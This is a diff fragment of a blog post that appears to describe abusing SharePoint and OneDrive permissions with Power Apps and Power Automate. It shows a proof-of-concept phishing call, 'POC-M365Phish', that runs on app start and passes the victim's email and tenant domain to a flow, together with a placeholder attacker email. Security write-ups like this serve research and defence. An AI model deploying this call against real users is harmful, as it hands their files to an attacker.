alecmaly/blog/_posts/2022/2022-05-13-Abusing-SharePoint-and-OneDrive-Permissions-with-PowerApps-and-Flow.md

     [![](/assets/posts/2022/2022-05-13-Abusing-SharePoint-and-OneDrive-Permissions-with-PowerApps-and-Flow/2021-10-17-21-23-12.png)](/assets/posts/2022/2022-05-13-Abusing-SharePoint-and-OneDrive-Permissions-with-PowerApps-and-Flow/2021-10-17-21-23-12.png)

-2. Create a PowerApp that calls the workflow with the following parameters.
+2. Create a Power App that calls the workflow OnStart with the following parameters.
 The parameters for the function are (1) the victim's email, (2) the domain of the tenant (this can be hardcoded, my quick attempt at regex will probably not work in all environments) (3) attacker email (**update this**).

 ```bash
 'POC-M365Phish'.Run(User().Email, First(MatchAll(User().Email, "(?<=@)[^.]+(?=\.)")).FullMatch, "attacker@domain.onmicrosoft.com")